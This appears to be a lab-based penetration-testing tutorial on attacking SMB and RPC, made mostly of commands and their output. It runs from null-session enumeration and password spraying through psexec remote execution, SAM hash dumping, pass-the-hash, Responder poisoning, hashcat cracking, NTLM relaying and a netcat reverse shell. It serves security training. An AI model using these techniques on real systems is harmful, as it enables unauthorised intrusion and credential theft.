neutron@kali[/kali]$ sudo nmap -sV -sC -p139,445

Starting Nmap 7.80 ( ) at 2021-09-19 15:15 CEST
Nmap scan report for
Host is up (0.00024s latency).

139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 00:00:00:00:00:00 (VMware)

Host script results:
|_nbstat: NetBIOS name: xyz, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-19T13:16:04
|_  start_date: N/A

Display a list of the server's shares with the option -L, and using the option -N, we tell smbclient to use the null session.

neutron@kali[/kali]$ smbclient -N -L //

        Sharename       Type      Comment
        -------      --     -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        notes           Disk      CheckIT
        IPC$            IPC       IPC Service (DEVSM)
SMB1 disabled no workgroup available

smbmap provided a list of permissions for each shared folder

neutron@kali[/kali]$ smbmap -H

[+] IP:     Name:                                   
        Disk                                                    Permissions     Comment
        --                                                   ---------    -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       IPC Service (DEVSM)
        notes                                                   READ, WRITE     CheckIT

Using smbmap with the -r or -R (recursive) option, one can browse the directories:

neutron@kali[/kali]$ smbmap -H -r notes

[+] Guest session       IP:    Name:                           
        Disk                                                    Permissions     Comment
        --                                                   ---------    -------
        notes                                                   READ, WRITE
        dr--r--r               0 Mon Nov  2 00:57:44 2020    .
        dr--r--r               0 Mon Nov  2 00:57:44 2020    ..
        dr--r--r               0 Mon Nov  2 00:57:44 2020    LDOUJZWBSG
        fw--w--w             116 Tue Apr 16 07:43:19 2019    note.txt
        fr--r--r               0 Fri Feb 22 07:43:28 2019    SDT65CB.tmp
        dr--r--r               0 Mon Nov  2 00:54:57 2020    TPLRNSMWHQ
        dr--r--r               0 Mon Nov  2 00:56:51 2020    WDJEQFZPNO
        dr--r--r               0 Fri Feb 22 07:44:02 2019    WindowsImageBackup

If read/write permissions, we can use this to upload and the files.

neutron@kali[/kali]$ smbmap -H --download "notes\note.txt"

[+] Starting download: notes\note.txt (116 bytes)
[+] File output to: /xyz/
neutron@kali[/kali]$ smbmap -H --upload test.txt "notes\test.txt"

[+] Starting upload: test.txt (20 bytes)
[+] Upload complete.

Remote Procedure Call (RPC)

We can use the rpcclient tool with a null session to enumerate a workstation or Domain Controller.

Cheat Sheet from SANS Institute

neutron@kali[/kali]$ rpcclient -U'%'

rpcclient $> enumdomusers

user:[mhope] rid:[0x641]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

Enum4linux automation

neutron@kali[/kali]$ ./ -A -C

ENUM4LINUX - next generation

|    Target Information    |
[*] Target ...........
[*] Username ......... ''
[*] Random Username .. 'noyyglci'
[*] Password ......... ''

|    Service Scan on     |
[*] Checking LDAP (timeout: 5s)
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS (timeout: 5s)
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB (timeout: 5s)
[*] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS (timeout: 5s)
[*] SMB over NetBIOS is accessible on 139/tcp

|    NetBIOS Names and Workgroup for    |
[*] Got domain/workgroup name: WORKGROUP
[*] Full NetBIOS names information:
- WIN-752039204 <00> -          B <ACTIVE>  Workstation Service
- WORKGROUP     <00> -          B <ACTIVE>  Workstation Service
- WIN-752039204 <20> -          B <ACTIVE>  Workstation Service
- MAC Address = 00-0C-29-D7-17-DB
|    SMB Dialect Check on    |


Protocol Specifics Attacks

Brute Forcing and Password Spray

neutron@kali[/kali]$ cat /tmp/userlist.txt

neutron@kali[/kali]$ crackmapexec smb -u /tmp/userlist.txt -p 'Company01!'

SMB 445    WIN7BOX  [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB 445    WIN7BOX  [-] WIN7BOX\Administrator:Company01! STATUS_LOGON_FAILURE 
SMB 445    WIN7BOX  [-] WIN7BOX\jrodriguez:Company01! STATUS_LOGON_FAILURE 
SMB 445    WIN7BOX  [-] WIN7BOX\admin:Company01! STATUS_LOGON_FAILURE 
SMB 445    WIN7BOX  [-] WIN7BOX\eperez:Company01! STATUS_LOGON_FAILURE 
SMB 445    WIN7BOX  [-] WIN7BOX\amone:Company01! STATUS_LOGON_FAILURE 
SMB 445    WIN7BOX  [-] WIN7BOX\fsmith:Company01! STATUS_LOGON_FAILURE 
SMB 445    WIN7BOX  [-] WIN7BOX\tcrash:Company01! STATUS_LOGON_FAILURE 


SMB 445    WIN7BOX  [+] WIN7BOX\jurena:Company01! (Pwn3d!) 

When attacking a Windows SMB Server, our actions will be limited by the privileges we had on the user we manage to compromise. If this user is an Administrator or has specific privileges, we will be able to perform operations such as:

  • Remote Command Execution
  • Extract Hashes from SAM Database
  • Enumerating Logged-on Users
  • Pass-the-Hash (PTH)

Impacket PsExec

neutron@kali[/kali]$ impacket-psexec administrator:'Password123!'@

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file EHtJXgng.exe
[*] Opening SVCManager on
[*] Creating service nbAc on
[*] Starting service nbAc.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19041.1415]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami && hostname

nt authority\system

The same options apply to impacket-smbexec and impacket-atexec.


One advantage of CrackMapExec is the availability to run a command on multiples host at a time. To use it, we need to specify the protocol, smb, the IP address or IP address range, the option -u for username, and -p for the password, and the option -x to run cmd commands or uppercase -X to run PowerShell commands.

neutron@kali[/kali]$ crackmapexec smb -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

SMB 445    WIN7BOX  [*] Windows 10.0 Build 19041 (name:WIN7BOX) (domain:.) (signing:False) (SMBv1:False)
SMB 445    WIN7BOX  [+] .\Administrator:Password123! (Pwn3d!)
SMB 445    WIN7BOX  [+] Executed command via smbexec
SMB 445    WIN7BOX  nt authority\system

If the --exec-method is not defined, CrackMapExec will try to execute the atexec method, if it fails we can try to specify the --exec-method smbexec.

Enumerating Logged-on Users

We are in a network with multiple machines. Some of them share the same local administrator account. In this case, we could use CrackMapExec to enumerate logged-on users on all machines within the same network

neutron@kali[/kali]$ crackmapexec smb -u administrator -p 'Password123!' --loggedon-users

SMB 445    WIN7BOX  [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB 445    WIN7BOX  [+] WIN7BOX\administrator:Password123! (Pwn3d!)
SMB 445    WIN7BOX  [+] Enumerated loggedon users
SMB 445    WIN7BOX  WIN7BOX\Administrator             logon_server: WIN7BOX
SMB 445    WIN7BOX  WIN7BOX\jurena                    logon_server: WIN7BOX
SMB 445    WIN10BOX  [*] Windows 10.0 Build 19041 (name:WIN10BOX) (domain:WIN10BOX) (signing:False) (SMBv1:False)
SMB 445    WIN10BOX  [+] WIN10BOX\Administrator:Password123! (Pwn3d!)
SMB 445    WIN10BOX  [+] Enumerated loggedon users
SMB 445    WIN10BOX  WIN10BOX\demouser                logon_server: WIN10BOX

Extract Hashes from SAM Database

  • Authenticate as another user.
  • Password Cracking, if we manage to crack the password, we can try to reuse the password for other services or accounts.
  • Pass The Hash
neutron@kali[/kali]$ crackmapexec smb -u administrator -p 'Password123!' --sam

SMB 445    WIN7BOX  [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB 445    WIN7BOX  [+] WIN7BOX\administrator:Password123! (Pwn3d!)
SMB 445    WIN7BOX  [+] Dumping SAM hashes
SMB 445    WIN7BOX  Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
SMB 445    WIN7BOX  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 445    WIN7BOX  DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 445    WIN7BOX  WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5717e1619e16b9179ef2e7138c749d65:::
SMB 445    WIN7BOX  jurena:1001:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
SMB 445    WIN7BOX  demouser:1002:aad3b435b51404eeaad3b435b51404ee:4c090b2a4a9a78b43510ceec3a60f90b:::
SMB 445    WIN7BOX  [+] Added 6 SAM hashes to the database

Pass-the-Hash (PtH)

We can use a PtH attack with any Impacket tool, SMBMap, CrackMapExec, among other tools.

neutron@kali[/kali]$ crackmapexec smb -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

SMB 445    WIN7BOX  [*] Windows 10.0 Build 19041 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False)
SMB 445    WIN7BOX  [+] WIN7BOX\Administrator:2B576ACBE6BCFDA7294D6BD18041B8FE (Pwn3d!)

Forced Authentication Attacks

We can also abuse the SMB protocol by creating a fake SMB Server to capture users' NetNTLM v1/v2 hashes.

When a user or a system tries to perform a Name Resolution (NR), a series of procedures are conducted by a machine to retrieve a host's IP address by its hostname. On Windows machines, the procedure will roughly be as follows:

  • The hostname file share's IP address is required.
  • The local host file (C:\Windows\System32\Drivers\etc\hosts) will be checked for suitable records.
  • If no records are found, the machine switches to the local DNS cache, which keeps track of recently resolved names.
  • Is there no local DNS record? A query will be sent to the DNS server that has been configured.
  • If all else fails, the machine will issue a multicast query, requesting the IP address of the file share from other machines on the network.

Suppose a user mistyped a shared folder's name \\mysharefoder\ instead of \\mysharedfolder\. In that case, all name resolutions will fail because the name does not exist, and the machine will send a multicast query to all devices on the network, including us running our fake SMB server.

neutron@kali[/kali]$ sudo responder -I ens33

  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|

           NBT-NS, LLMNR & MDNS Responder

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C

[+] Poisoners:                
    LLMNR                      [ON]
    NBT-NS                     [ON]        
    DNS/MDNS                   [ON]   

[+] Servers:         
    HTTP server                [ON]                                   
    HTTPS server               [ON]
    WPAD proxy                 [OFF]                                  
    Auth proxy                 [OFF]
    SMB server                 [ON]                                   
    Kerberos server            [ON]                                   
    SQL server                 [ON]                                   
    FTP server                 [ON]                                   
    IMAP server                [ON]                                   
    POP3 server                [ON]                                   
    SMTP server                [ON]                                   
    DNS server                 [ON]                                   
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]                                   

[+] HTTP Options:                                                                  
    Always serving EXE         [OFF]                                               
    Serving EXE                [OFF]                                               
    Serving HTML               [OFF]                                               
    Upstream Proxy             [OFF]                                               

[+] Poisoning Options:                                                             
    Analyze Mode               [OFF]                                               
    Force WPAD auth            [OFF]                                               
    Force Basic Auth           [OFF]                                               
    Force LM downgrade         [OFF]                                               
    Fingerprint hosts          [OFF]                                               

[+] Generic Options:                                                               
    Responder NIC              [tun0]                                              
    Responder IP               []                                      
    Challenge set              [random]                                            
    Don't Respond To Names     ['ISATAP']                                          

[+] Current Session Variables:                                                     
    Responder Machine Name     [WIN-2TY1Z1CIGXH]   
    Responder Domain Name      [HF2L.LOCAL]                                        
    Responder DCE-RPC Port     [48162] 

[+] Listening for events... 

[*] [NBT-NS] Poisoned answer sent to for name WORKGROUP (service: Domain Master Browser)
[*] [NBT-NS] Poisoned answer sent to for name WORKGROUP (service: Browser Election)
[*] [MDNS] Poisoned answer sent to   for name mysharefoder.local
[*] [LLMNR]  Poisoned answer sent to for name mysharefoder
[*] [MDNS] Poisoned answer sent to   for name mysharefoder.local
[SMB] NTLMv2-SSP Client   :
[SMB] NTLMv2-SSP Username : WIN7BOX\demouser
[SMB] NTLMv2-SSP Hash     : demouser::WIN7BOX:997b18cc61099ba2:3CC46296B0CCFC7A231D918AE1DAE521:0101000000000000B09B51939BA6D40140C54ED46AD58E890000000002000E004E004F004D00410054004300480001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D0042003100320008003000300000000000000000000000003000004289286EDA193B087E214F3E16E2BE88FEC5D9FF73197456C9A6861FF5B5D3330000000000000000

All saved Hashes are located in Responder's logs directory (/usr/share/responder/logs/).

neutron@kali[/kali]$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...


Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921355
* Keyspace..: 14344386


Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: ADMINISTRATOR::WIN-487IMQOIA8E:997b18cc61099ba2:3cc...000000
Time.Started.....: Mon Apr 11 16:49:34 2022 (1 sec)
Time.Estimated...: Mon Apr 11 16:49:35 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1122.4 kH/s (1.34ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 75776/14344386 (0.53%)
Rejected.........: 0/75776 (0.00%)
Restore.Point....: 73728/14344386 (0.51%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: compu -> kodiak1

Started: Mon Apr 11 16:49:34 2022
Stopped: Mon Apr 11 16:49:37 2022

If we cannot crack the hash, we can potentially relay the captured hash to another machine using impacket-ntlmrelayx or Responder Let us see an example using impacket-ntlmrelayx.

Set SMB to OFF in our responder configuration file (/etc/responder/Responder.conf).

neutron@kali[/kali]$ cat /etc/responder/Responder.conf | grep 'SMB ='

SMB = Off

Then we execute impacket-ntlmrelayx with the option --no-http-server, -smb2support, and the target machine with the option -t. By default, impacket-ntlmrelayx will dump the SAM database, but we can execute commands by adding the option -c.

neutron@kali[/kali]$ impacket-ntlmrelayx --no-http-server -smb2support -t

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation


[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server

[*] Servers started, waiting for connections

[*] SMBD-Thread-3: Connection from /[email protected] controlled, attacking target smb://
[*] Authenticating against smb:// as /ADMINISTRATOR SUCCEED
[*] SMBD-Thread-3: Connection from /[email protected] controlled, but there are no more targets left!
[*] SMBD-Thread-5: Connection from /[email protected] controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xeb0432b45874953711ad55884094e9d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Done dumping SAM hashes for host:
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

We can create a PowerShell reverse shell using, set our machine IP address, port, and the option Powershell #3 (Base64).


Once the victim authenticates to our server, we poison the response and make it execute our command to obtain a reverse shell.

neutron@kali[/kali]$ nc -lvnp 9001

listening on [any] 9001 ...
connect to [] from (UNKNOWN) [] 52471

PS C:\Windows\system32> whoami;hostname

nt authority\system


Apart from enumeration, we can use RPC to make changes to the system:

  • Change a user's password.
  • Create a new domain user.
  • Create a new shared folder.